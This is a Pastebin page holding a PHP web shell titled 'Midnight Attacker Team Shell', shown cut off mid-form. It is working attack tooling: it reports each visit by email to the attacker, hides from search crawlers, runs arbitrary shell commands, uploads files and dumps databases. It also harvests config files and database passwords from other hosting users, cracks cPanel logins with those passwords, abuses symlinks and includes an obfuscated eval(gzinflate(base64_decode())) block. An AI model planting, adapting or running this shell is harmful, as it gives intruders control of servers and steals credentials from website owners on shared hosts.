API tools faq
paste
Cirara

Midnight Attacker Team Shell V.1

Cirara
May 19th, 2020
312
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 30.02 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $ip = getenv("REMOTE_ADDR");
  3. $ken = rand(1, 99999);
  4. $subj98 = " Result shell bouz |$ken";
  5. $email = "[email protected]";
  6. $from = "From: [email protected]";
  7. $tot = $_SERVER['REQUEST_URI'];
  8. $kon = $_SERVER['HTTP_HOST'];
  9. $tol = $ip . "";
  10. $msg8873 = "$kon $tot $tol";
  11. mail($email, $subj98, $msg8873, $from);
  12.  
  13. error_reporting(0);
  14. set_time_limit(0);
  15.  
  16. if(get_magic_quotes_gpc()){
  17. foreach($_POST as $key=>$value){
  18. $_POST[$key] = stripslashes($value);
  19. }
  20. }
  21. error_reporting(0);
  22. set_time_limit(0);
  23. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  24.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  25.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  26.         header('HTTP/1.0 404 Not Found');
  27.         exit;
  28.     }
  29. }
  30. function w($path,$perm) {
  31.   if(!is_writable($path)) {
  32.     return "<font color=red>".$perm."</font>";
  33.   } else {
  34.     return "<font color=white>".$perm."</font>";
  35.   }
  36. }
  37. function r($path,$perm) {
  38.   if(!is_readable($path)) {
  39.     return "<font color=red>".$perm."</font>";
  40.   } else {
  41.     return "<font color=white>".$perm."</font>";
  42.   }
  43. }
  44. function perms($file){
  45.   $perms = fileperms($file);
  46.   if (($perms & 0xC000) == 0xC000) {
  47.   // Socket
  48.   $info = 's';
  49.   } elseif (($perms & 0xA000) == 0xA000) {
  50.   // Symbolic Link
  51.   $info = 'l';
  52.   } elseif (($perms & 0x8000) == 0x8000) {
  53.   // Regular
  54.   $info = '-';
  55.   } elseif (($perms & 0x6000) == 0x6000) {
  56.   // Block special
  57.   $info = 'b';
  58.   } elseif (($perms & 0x4000) == 0x4000) {
  59.   // Directory
  60.   $info = 'd';
  61.   } elseif (($perms & 0x2000) == 0x2000) {
  62.   // Character special
  63.   $info = 'c';
  64.   } elseif (($perms & 0x1000) == 0x1000) {
  65.   // FIFO pipe
  66.   $info = 'p';
  67.   } else {
  68.   // Unknown
  69.   $info = 'u';
  70.   }
  71.     // Owner
  72.   $info .= (($perms & 0x0100) ? 'r' : '-');
  73.   $info .= (($perms & 0x0080) ? 'w' : '-');
  74.   $info .= (($perms & 0x0040) ?
  75.   (($perms & 0x0800) ? 's' : 'x' ) :
  76.   (($perms & 0x0800) ? 'S' : '-'));
  77.   // Group
  78.   $info .= (($perms & 0x0020) ? 'r' : '-');
  79.   $info .= (($perms & 0x0010) ? 'w' : '-');
  80.   $info .= (($perms & 0x0008) ?
  81.   (($perms & 0x0400) ? 's' : 'x' ) :
  82.   (($perms & 0x0400) ? 'S' : '-'));
  83.   // World
  84.   $info .= (($perms & 0x0004) ? 'r' : '-');
  85.   $info .= (($perms & 0x0002) ? 'w' : '-');
  86.   $info .= (($perms & 0x0001) ?
  87.   (($perms & 0x0200) ? 't' : 'x' ) :
  88.   (($perms & 0x0200) ? 'T' : '-'));
  89.   return $info;
  90. }
  91. echo "<title>M°A TEAM SHELL</title>
  92. <style>
  93. html {
  94. color: ;
  95. }
  96. body {
  97. background-color: black;
  98. color: white;
  99. }
  100. a {
  101. color: white;
  102. text-decoration: none;
  103. }
  104. hr {
  105. color: white;
  106. }
  107. textarea {
  108. border: 1px solid white;
  109. color: white;
  110. background: transparent;
  111. }
  112. li {
  113. display: inline;
  114. margin: 5px;
  115. color: white;
  116. }
  117. .i {
  118. color: white;
  119. }
  120. input { background: transparent; color: white; border: 1px solid white; }
  121. select { background: transparent; color: white; border: 1px solid black; }
  122. .aw { background: transparent; color: white; border: 1px solid white; padding: 5px; width: 30%;}
  123. </style>
  124. <hr>
  125. <center><b><i><font size='20'>Midnight Attacker Team</font>
  126. <hr><div class='aw'>Path : ";
  127. if(get_magic_quotes_gpc()){
  128. foreach($_POST as $key=>$value){
  129. $_POST[$key] = stripslashes($value);
  130. }
  131. }
  132. if(isset($_GET['path'])){
  133. $path = $_GET['path'];
  134. }else{
  135. $path = getcwd();
  136. }
  137. $path = str_replace('\\','/',$path);
  138. $paths = explode('/',$path);
  139.  
  140. foreach($paths as $id=>$pat){
  141. if($pat == '' && $id == 0){
  142. $a = true;
  143. echo '<a href="?path=/">/</a>';
  144. continue;
  145. }
  146. if($pat == '') continue;
  147. echo '<a href="?path=';
  148. for($i=0;$i<=$id;$i++){
  149. echo "$paths[$i]";
  150. if($i != $id) echo "/";
  151. }
  152. echo '">'.$pat.'</a>/';
  153. }
  154. echo '</b></i>';
  155. chdir ($path);
  156. echo "<br><br><center>Permission Directory : [ ".w($path, perms($path))." ]</center></div><br>";
  157. echo '<form enctype="multipart/form-data" method="POST">
  158. <input type="file" name="cracker" />
  159. <input type="submit" value="upload" />
  160. </form>';
  161. if(isset($_FILES['cracker'])){
  162. if(copy($_FILES['cracker']['tmp_name'],$path.'/'.$_FILES['cracker']['name'])){
  163. echo '<font color="green">UPLOAD BERHASIL</font><br/>';
  164. }else{
  165. echo '<font color="red">UPLOAD GAGAL</font><br/>';
  166. }
  167. }
  168. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  169. $svr = php_uname();
  170. $x = (shell_exec('dir')) ? "ON" : "OFF";
  171. $c = (function_exists('curl_version')) ? "ON" : "OFF";
  172. if(!function_exists('posix_getegid')) {
  173. $user = @posix_getpwuid(posix_geteuid());
  174. $user = $user['name'];
  175. } else {
  176. $user = @posix_getpwuid(posix_geteuid());
  177. $user = $user['name'];
  178. }
  179. echo "<hr>Kernel : $svr<br>IP HOST : $ip<br>";
  180. echo "<br>Command : $x | Curl : $c</center><hr><center>";
  181. echo "<li>[ <a class='i' href='?'>Home</a> ]</li>";
  182. echo "<li>[ <a class='i' href='?path=$path&dbdump'>DB Dumper</a> ]</li>";
  183. echo "<li>[ <a class='i' href='?path=$path&it=config'>Config Grabber</a> ]</li>";
  184. echo "<li>[ <a class='i' href='?path=$path&it=cpanel'>Cpanel Crack</a> ]</li>";
  185. echo "<li>[ <a class='i' href='?path=$path&it=jmp'>Jumping</a> ]</li>";
  186. echo "<li>[ <a class='i' href='?path=$path&it=sym'>Symlink</a> ]</li>";
  187. echo "<li>[ <a class='i' href='?path=$path&it=sym_404'>Bypass Symlink 404</a> ]</li>";
  188. echo "<li>[ <a class='i' href='?path=$path&it=admnr'>Adminer</a> ]</li>";
  189. echo "<li>[ <a class='i' href='?logout=true'>Logout</a> ]</li><td></table><hr>";
  190. echo "</center>PHP Execution Command<hr>
  191. <form enctype='multipart/form-data' method='post'>
  192. $user@$ip:~# <input type='text' name='cok'>
  193. <input type='submit' value='~'>
  194. </form>";
  195. chdir($path);
  196. if(isset($_POST['cok'])) {
  197. $cok = shell_exec($_POST['cok']);
  198. }
  199. echo '<textarea class="textarea" style="width: 100%" rows="10">' . htmlentities($cok) . '</textarea>';
  200. if($_GET['logout'] == true) {
  201.   unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  202.   echo "<script>window.location='?';</script>";
  203. } elseif($_GET['it'] == 'sym_404') {
  204. echo '<hr><form enctype="multipart/form-data" method="post">
  205. File Target : <input type="text" name="dir" placeholder="/home/user/public_html/wp-config.php"><br><br>
  206. Save Sebagai : <input type="text" name="save"><br><br><input name="bypass" type="submit" value="Bypass !!!"></form>
  207. ';
  208. if($_POST['bypass']) {
  209. mkdir("sym404", 0777);
  210. $dir = $_POST['dir'];
  211. $save = $_POST['save'];
  212. shell_exec("ln -s".$dir." sym404/".$save);
  213. symlink($dir,"sym404/".$save);
  214. $fopsym = fopen("sym404/.htaccess","w");
  215. fwrite($fopsym,"ReadmeName ".$save);
  216. fclose($fopsym);
  217. echo '<a href="sym404/">Touch !!!</a>';
  218. }
  219. } elseif($_GET['it'] == 'sym') {
  220. echo '<hr>';
  221. eval(gzinflate(base64_decode('7Vf/T9tGFP89Uv6Hx5HJ9kjtJKhrReKUrjCt0lakQrdJUEWOfcYeF591d8GklP997852SOME1C/SNqlIRM777vfl81468Zwx8EEqMRE0Z0FI7c7k9PjtH8dvz62jk1fvfj9+czZ5e3JyZr3vAiFd6OSBSpxhu9WJerMgzSSqH8YpozbxqAq9LJjRyA15FhMttbubKIVmZbuVxnat49y2W4ezqygVNpGLbCIXM9LtPXv2TKschsknDEOjNzS0CcvgiQQPBOfK0Dva8z6GYJ3kKuUYzessQlkJv3DGeHG6mP2WZlfo/SgVNFRcLIwAoHE3UbN262UUnS1yCoreKA8zkGbg5kkOhvNrkEWMinVmu3UaqFTGC3iZLSwTRq6DiHlOM9tCw0GIryytrlVYZZiF4RciVZhhlO6WkTvDwzhkXJZELUrDhANpt0YqmDIKAUsvMz+kmcIwplxEVPj7WK8Fo75VpJFKDn7q/TAsOU9Czrg42H3+cw//htZYmxHmM/rE0ngU80yBEfdZOqMg0w/UH4xPXXjD3ZGn2eORp6LPUT7iprhfqP1OUvGlulhmhmVe0/bw3Ynp1JDPUc+HPn6LuaBBmCx7EQIJ1bNuS+xSKuhlapMPPKOkW7Oc2xzJk1mgwmQSMGZbu1oAiO3+6JBdq1sb0Q9lInQ5YzaXia2f0DCOGcMGUSKd2bXQef/9ee+948AYBtp/Z455wFBzLtObySVVeTFPI9uMGC8yKqo5u8bEBJJKj7jrppZdhMVfyx8mpsxhlTgCLtTpcVFhS/oZjZEaQCJo7ONA5weeVxSFu+7bJV5dIxZI6asbNW7KLL0EK560nH71c0sjiGXElrzatdXRgOVVyOBpGPASPqNeQ9nL51OWhhOccWaBCgRm0rcmUxZkV1YjxvX+qQKrOghWy1hla29veHd3t0y0Z6bVdNsdZZLqQp4dn575JTRapmQ5uisiq2wGsI3AZyPhfxsI4TEkhAegELnraAg1HMIDeNgflygHW/DC9Pr+Rmx7RGUDJj3mpIlESxyCT4EIzHsvk0VWegT3LBHEAS6A3qTKJu8y8/aKg5YFrbhj6g5FohtsJ6Yc16umO7qloKP3coxNLyuqcWjQi2pWIESwsEuqDuge3LBZLzwEtRfOxcGF50mNbLK71F03tHo6kHIWu3gn1BI480bjHv2WhhDx+gP4+BEaDN+Hnmbcu/GBTNOMNIg6ZX/1+14sm7zrQHgsnXrZNmYg8kKTNnMveZ5Q0eTJjYEYe9GsyZhLNIWgtCWGWOWb3yrbxNAaiLubGebyIg4mG68vlWZzej9AekAeatwNm+DBbl+Bd61Xh1IrklXPjxiosX0rtK85WEX2BrAvxy/YMnsat5cYU8/FOoiXEK7vVS5hB9P7Z5pFvJDEud2C1U2k1hdrA6fvURq9fiZQ93rPvwFIt1tfDdMPYHRd4mRQFdi6GjC2vx8NlqWBUyquqRh5yWD8TWD99dG/CumKznJMFCHDDp5kfXzsmaeBRnl9haMQnpx2xR75YLjl1709B247eN/pH1FrF58RqLATjwUkOaUz14e/eYplO7C6huySiwybtq6ENZoKb2wN69DKc1N/qRrwKRJNVGbtKCqVi4OIsF2UKyXO5/XaeNqtFDV5ZWyeoqmVZVZvsk1Wv2qTNdfYt9lh3xfY9wX2/11ga8O4YYeNvCi9xs8qZDKcZ9rsylwapTvQmw7u1Tfh36sgyzi+MP5sVhTW0XDpQZsr/1+M/wE=')));
  222. } elseif($_GET['it'] == 'admnr') {
  223.         echo "<hr>";
  224.   $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  225.   function adminer($url, $isi) {
  226.     $fp = fopen($isi, "w");
  227.     $ch = curl_init();
  228.          curl_setopt($ch, CURLOPT_URL, $url);
  229.          curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  230.          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  231.          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  232.            curl_setopt($ch, CURLOPT_FILE, $fp);
  233.     return curl_exec($ch);
  234.            curl_close($ch);
  235.     fclose($fp);
  236.     ob_flush();
  237.     flush();
  238.   }
  239.   if(file_exists('adminer.php')) {
  240.     echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  241.   } else {
  242.     if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  243.       echo "<center><font color=green><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  244.     } else {
  245.       echo "<center><font color=red>gagal buat file adminer</font></center>";
  246.     }
  247.   }
  248. } elseif($_GET['it'] == 'jmp') {
  249.         echo "<hr>";
  250.   $i = 0;
  251.   echo "<div class='margin: 5px auto;'>";
  252.   if(preg_match("/hsphere/", $path)) {
  253.     $urls = explode("\r\n", $_POST['url']);
  254.     if(isset($_POST['jump'])) {
  255.       echo "<pre>";
  256.       foreach($urls as $url) {
  257.         $url = str_replace(array("http://","www."), "", strtolower($url));
  258.         $etc = "/etc/passwd";
  259.         $f = fopen($etc,"r");
  260.         while($gets = fgets($f)) {
  261.           $pecah = explode(":", $gets);
  262.           $user = $pecah[0];
  263.           $dir_user = "/hsphere/local/home/$user";
  264.           if(is_dir($dir_user) === true) {
  265.             $url_user = $dir_user."/".$url;
  266.             if(is_readable($url_user)) {
  267.               $i++;
  268.               $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=red>$url_user</font></a>";
  269.               if(is_writable($url_user)) {
  270.                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=red>$url_user</font></a>";
  271.               }
  272.               echo $jrw."<br>";
  273.             }
  274.           }
  275.         }
  276.       }
  277.     if($i == 0) {
  278.     } else {
  279.       echo "<br>Total ada ".$i." Kamar di ".$ip;
  280.     }
  281.     echo "</pre>";
  282.     } else {
  283.       echo '<center>
  284.          <form method="post">
  285.          List Domains: <br>
  286.          <textarea name="url" style="width: 500px; height: 250px;">';
  287.       $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  288.       while($getss = fgets($fp)) {
  289.         echo $getss;
  290.       }
  291.       echo  '</textarea><br>
  292.          <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  293.          </form></center>';
  294.     }
  295.   } elseif(preg_match("/vhosts/", $path)) {
  296.     $urls = explode("\r\n", $_POST['url']);
  297.     if(isset($_POST['jump'])) {
  298.       echo "<pre>";
  299.       foreach($urls as $url) {
  300.         $web_vh = "/var/www/vhosts/$url/httpdocs";
  301.         if(is_dir($web_vh) === true) {
  302.           if(is_readable($web_vh)) {
  303.             $i++;
  304.             $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=red>$web_vh</font></a>";
  305.             if(is_writable($web_vh)) {
  306.               $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=red>$web_vh</font></a>";
  307.             }
  308.             echo $jrw."<br>";
  309.           }
  310.         }
  311.       }
  312.     if($i == 0) {
  313.     } else {
  314.       echo "<br>Total ada ".$i." Kamar di ".$ip;
  315.     }
  316.     echo "</pre>";
  317.     } else {
  318.       echo '<center>
  319.          <form method="post">
  320.          List Domains: <br>
  321.          <textarea name="url" style="width: 500px; height: 250px;">';
  322.           bing("ip:$ip");
  323.       echo  '</textarea><br>
  324.          <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  325.          </form></center>';
  326.     }
  327.   } else {
  328.     echo "<pre>";
  329.     $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  330.     while($passwd = fgets($etc)) {
  331.       if($passwd == '' || !$etc) {
  332.         echo "<font color=red>Can't read /etc/passwd</font>";
  333.       } else {
  334.         preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  335.         foreach($user_jumping[1] as $user_idx_jump) {
  336.           $user_jumping_dir = "/home/$user_idx_jump/public_html";
  337.           if(is_readable($user_jumping_dir)) {
  338.             $i++;
  339.             $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=red>$user_jumping_dir</font></a>";
  340.             if(is_writable($user_jumping_dir)) {
  341.               $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=red>$user_jumping_dir</font></a>";
  342.             }
  343.             echo $jrw;
  344.             if(function_exists('posix_getpwuid')) {
  345.               $domain_jump = file_get_contents("/etc/named.conf");  
  346.               if($domain_jump == '') {
  347.                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  348.               } else {
  349.                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  350.                 foreach($domains_jump[1] as $dj) {
  351.                   $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  352.                   $user_jumping_url = $user_jumping_url['name'];
  353.                   if($user_jumping_url == $user_idx_jump) {
  354.                     echo " => ( <u>$dj</u> )<br>";
  355.                     break;
  356.                   }
  357.                 }
  358.               }
  359.             } else {
  360.               echo "<br>";
  361.             }
  362.           }
  363.         }
  364.       }
  365.     }
  366.     if($i == 0) {
  367.     } else {
  368.       echo "<br>Total ada ".$i." Kamar di ".$ip;
  369.     }
  370.     echo "</pre>";
  371.   }
  372.   echo "</div>";
  373. } elseif(isset($_GET['dbdump'])) {
  374.   echo '<hr><pre><center>';
  375.   echo '
  376. <form action=?dbdump method=post>
  377. Database Dump
  378. Server        : <input class="inputz" type=text name=server size=52>
  379. Username      : <input class="inputz" type=text name=username size=52>
  380. Password      : <input class="inputz" type=text name=password size=52>
  381. DataBase Name : <input class="inputz" type=text name=dbname size=52>
  382. DB Type       : <form method=post action="?dbdump"><select class="inputz" name=method><option  value="gzip">Gzip</option><option value="sql">Sql</option></select>
  383. <input class="inputzbut" type=submit value="  Dump!  " >
  384. </form></center></pre><script>';
  385.   if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  386.   $date = date("Y-m-d");
  387.   $dbserver = $_POST['server'];
  388.   $dbuser = $_POST['username'];
  389.   $dbpass = $_POST['password'];
  390.   $dbname = $_POST['dbname'];
  391.   $file = "Dump-$dbname-$date";
  392.   $method = $_POST['method'];
  393.   if ($method=='sql'){
  394.   $file="Dump-$dbname-$date.sql";
  395.   $fp=fopen($file,"w");
  396.   }else{
  397.   $file="Dump-$dbname-$date.sql.gz";
  398.   $fp = gzopen($file,"w");
  399.   }
  400.   function write($data) {
  401.   global $fp;
  402.   if ($_POST['method']=='ssql'){
  403.   fwrite($fp,$data);
  404.   }else{
  405.   gzwrite($fp, $data);
  406.   }}
  407.   mysql_connect ($dbserver, $dbuser, $dbpass);
  408.   mysql_select_db($dbname);
  409.   $tables = mysql_query ("SHOW TABLES");
  410.   while ($i = mysql_fetch_array($tables)) {
  411.       $i = $i['Tables_in_'.$dbname];
  412.       $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  413.       write($create['Create Table'].";nn");
  414.       $sql = mysql_query ("SELECT * FROM ".$i);
  415.       if (mysql_num_rows($sql)) {
  416.           while ($row = mysql_fetch_row($sql)) {
  417.               foreach ($row as $j => $k) {
  418.                   $row[$j] = "'".mysql_escape_string($k)."'";
  419.               }
  420.               write("INSERT INTO $i VALUES(".implode(",", $row).");n");
  421.           }
  422.       }
  423.   }
  424.   if ($method=='ssql'){
  425.   fclose ($fp);
  426.   }else{
  427.   gzclose($fp);}
  428.   header("Content-Disposition: attachment; filename=" . $file);
  429.   header("Content-Type: application/download");
  430.   header("Content-Length: " . filesize($file));
  431.   flush();
  432.  
  433.   $fp = fopen($file, "r");
  434.   while (!feof($fp))
  435.   {
  436.       echo fread($fp, 65536);
  437.       flush();
  438.   }
  439.   fclose($fp);
  440.   }
  441.  
  442. } elseif($_GET['it'] == 'cpanel') {
  443.         echo "<hr>";
  444.   if($_POST['crack']) {
  445.     $usercp = explode("\r\n", $_POST['user_cp']);
  446.     $passcp = explode("\r\n", $_POST['pass_cp']);
  447.     $i = 0;
  448.     foreach($usercp as $ucp) {
  449.       foreach($passcp as $pcp) {
  450.         if(@mysql_connect('localhost', $ucp, $pcp)) {
  451.           if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  452.           } else {
  453.             $_SESSION[$ucp] = "1";
  454.             $_SESSION[$pcp] = "1";
  455.             if($ucp == '' || $pcp == '') {
  456.              
  457.             } else {
  458.               $i++;
  459.               if(function_exists('posix_getpwuid')) {
  460.                 $domain_cp = file_get_contents("/etc/named.conf");  
  461.                 if($domain_cp == '') {
  462.                   $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  463.                 } else {
  464.                   preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  465.                   foreach($domains_cp[1] as $dj) {
  466.                     $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  467.                     $user_cp_url = $user_cp_url['name'];
  468.                     if($user_cp_url == $ucp) {
  469.                       $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  470.                       break;
  471.                     }
  472.                   }
  473.                 }
  474.               } else {
  475.                 $dom = "<font color=red>function is Disable by system</font>";
  476.               }
  477.               echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  478.             }
  479.           }
  480.         }
  481.       }
  482.     }
  483.     if($i == 0) {
  484.     } else {
  485.       echo "<br>sukses Crack ".$i." Cpanel by <font color=green>M°A TEAM</font>";
  486.     }
  487.   } else {
  488.     echo "<center>
  489.    <form method='post'>
  490.    USER: <br>
  491.    <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  492.     $_usercp = fopen("/etc/passwd","r");
  493.     while($getu = fgets($_usercp)) {
  494.       if($getu == '' || !$_usercp) {
  495.         echo "<font color=red>Can't read /etc/passwd</font>";
  496.       } else {
  497.         preg_match_all("/(.*?):x:/", $getu, $u);
  498.         foreach($u[1] as $user_cp) {
  499.             if(is_dir("/home/$user_cp/public_html")) {
  500.               echo "$user_cp\n";
  501.           }
  502.         }
  503.       }
  504.     }
  505.     echo "</textarea><br>
  506.    PASS: <br>
  507.    <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  508.     function cp_pass($dir) {
  509.       $pass = "";
  510.       $dira = scandir($dir);
  511.       foreach($dira as $dirb) {
  512.         if(!is_file("$dir/$dirb")) continue;
  513.         $ambil = file_get_contents("$dir/$dirb");
  514.         if(preg_match("/WordPress/", $ambil)) {
  515.           $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  516.         } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  517.           $pass .= ambilkata($ambil,"password = '","'")."\n";
  518.         } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  519.           $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  520.         } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  521.           $pass .= ambilkata($ambil,'password = "','"')."\n";
  522.         } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  523.           $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  524.         } elseif(preg_match("/^[client]$/", $ambil)) {
  525.           preg_match("/password=(.*?)/", $ambil, $pass1);
  526.           if(preg_match('/"/', $pass1[1])) {
  527.             $pass1[1] = str_replace('"', "", $pass1[1]);
  528.             $pass .= $pass1[1]."\n";
  529.           } else {
  530.             $pass .= $pass1[1]."\n";
  531.           }
  532.         } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  533.           $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  534.         }
  535.       }
  536.       echo $pass;
  537.     }
  538.     $cp_pass = cp_pass($dir);
  539.     echo $cp_pass;
  540.     echo "</textarea><br>
  541.    <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  542.    </form>
  543.    <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  544.   }
  545. } elseif($_GET['it'] == 'config') {
  546.         echo "<hr>";
  547.         chdir($path);
  548.   $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  549.   $cracker = mkdir("syn_config", 0777);
  550.   $isi_htc = "Options all\nRequire None\nSatisfy Any";
  551.   $htc = fopen("decay_config/.htaccess","w");
  552.   fwrite($htc, $isi_htc);
  553.   while($passwd = fgets($etc)) {
  554.     if($passwd == "" || !$etc) {
  555.       echo "<font color=red>Can't read /etc/passwd</font>";
  556.     } else {
  557.       preg_match_all('/(.*?):x:/', $passwd, $user_config);
  558.       foreach($user_config[1] as $user_cracker) {
  559.         $user_config_dir = "/home/$user_cracker/public_html/";
  560.         if(is_readable($user_config_dir)) {
  561.           $grab_config = array(
  562.             "/home/$user_cracker/.my.cnf" => "cpanel",
  563.             "/home/$user_cracker/.accesshash" => "WHM-accesshash",
  564.             "/home/$user_cracker/public_html/po-content/config.php" => "Popoji",
  565.             "/home/$user_cracker/public_html/vdo_config.php" => "Voodoo",
  566.             "/home/$user_cracker/public_html/bw-configs/config.ini" => "BosWeb",
  567.             "/home/$user_cracker/public_html/config/koneksi.php" => "Lokomedia",
  568.             "/home/$user_cracker/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  569.             "/home/$user_cracker/public_html/clientarea/configuration.php" => "WHMCS",
  570.             "/home/$user_cracker/public_html/whm/configuration.php" => "WHMCS",
  571.             "/home/$user_cracker/public_html/whmcs/configuration.php" => "WHMCS",
  572.             "/home/$user_cracker/public_html/forum/config.php" => "phpBB",
  573.             "/home/$user_cracker/public_html/sites/default/settings.php" => "Drupal",
  574.             "/home/$user_cracker/public_html/config/settings.inc.php" => "PrestaShop",
  575.             "/home/$user_cracker/public_html/app/etc/local.xml" => "Magento",
  576.             "/home/$user_cracker/public_html/joomla/configuration.php" => "Joomla",
  577.             "/home/$user_cracker/public_html/configuration.php" => "Joomla",
  578.             "/home/$user_cracker/public_html/wp/wp-config.php" => "WordPress",
  579.             "/home/$user_cracker/public_html/wordpress/wp-config.php" => "WordPress",
  580.             "/home/$user_cracker/public_html/wp-config.php" => "WordPress",
  581.             "/home/$user_cracker/public_html/admin/config.php" => "OpenCart",
  582.             "/home/$user_cracker/public_html/slconfig.php" => "Sitelok",
  583.             "/home/$user_cracker/public_html/application/config/database.php" => "Ellislab");
  584.           foreach($grab_config as $config => $nama_config) {
  585.             $ambil_config = file_get_contents($config);
  586.             if($ambil_config == '') {
  587.             } else {
  588.               $file_config = fopen("decay_config/$user_cracker-$nama_config.txt","w");
  589.               fputs($file_config,$ambil_config);
  590.             }
  591.           }
  592.         }    
  593.       }
  594.     }  
  595.   }
  596.   echo "<center><a href='?path=$path/syn_config'><font color=green>Done</font></a></center>";
  597. }
  598. chdir($path);
  599. echo '<hr>File Manager / Change FTP || ';
  600. echo "[ <a href='?path=$path&iac=newfile'>File Baru</a> ]";
  601. echo "[ <a href='?path=$path&iac=newfolder'>Folder Baru</a> ]<hr>";
  602. if($_GET['iac'] == 'newfile') {
  603.         echo "<hr>";
  604.   if($_POST['new_save_file']) {
  605.     $newfile = htmlspecialchars($_POST['newfile']);
  606.     $fopen = fopen($newfile, "a+");
  607.     if($fopen) {
  608.       $act = "<script>window.location='?act=edit&path=".$path."&file=".$_POST['newfile']."';</script>";
  609.     } else {
  610.       $act = "<font color=red>permission denied</font>";
  611.     }
  612.   }
  613.   echo $act;
  614.   echo "<form method='post'>
  615.  Filename: <input type='text' name='newfile' value='$path/newfile.php' style='width: 450px;' height='10'>
  616.  <input type='submit' name='new_save_file' value='Submit'>
  617.  </form>";
  618. } elseif($_GET['iac'] == 'newfolder') {
  619.         echo "<hr>";
  620.   if($_POST['new_save_folder']) {
  621.     $new_folder = $path.'/'.htmlspecialchars($_POST['newfolder']);
  622.     if(!mkdir($new_folder)) {
  623.       $act = "<font color=red>permission denied</font>";
  624.     } else {
  625.       $act = "<script>window.location='?path=".$path."';</script>";
  626.     }
  627.   }
  628.   echo $act;
  629.   echo "<form method='post'>
  630.  Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  631.  <input type='submit' name='new_save_folder' value='Submit'>
  632.  </form>";
  633. }
  634. if(isset($_GET['filesrc'])){
  635. echo "<tr><td>Current File : ";
  636. echo $_GET['filesrc'];
  637. echo '</tr></td></table><br />';
  638. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  639. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  640. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  641. if($_POST['opt'] == 'chmod'){
  642. if(isset($_POST['perm'])){
  643. if(chmod($_POST['path'],$_POST['perm'])){
  644. echo '<font color="green">Change Permission Berhasil</font><br/>';
  645. }else{
  646. echo '<font color="red">Change Permission Gagal</font><br />';
  647. }
  648. }
  649. echo '<form method="POST">
  650. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  651. <input type="hidden" name="path" value="'.$_POST['path'].'">
  652. <input type="hidden" name="opt" value="chmod">
  653. <input type="submit" value="Go" />
  654. </form>';
  655. }elseif($_POST['opt'] == 'rename'){
  656. if(isset($_POST['newname'])){
  657. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  658. echo '<font color="green">Ganti Nama Berhasil</font><br/>';
  659. }else{
  660. echo '<font color="red">Ganti Nama Gagal</font><br />';
  661. }
  662. $_POST['name'] = $_POST['newname'];
  663. }
  664. echo '<form method="POST">
  665. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  666. <input type="hidden" name="path" value="'.$_POST['path'].'">
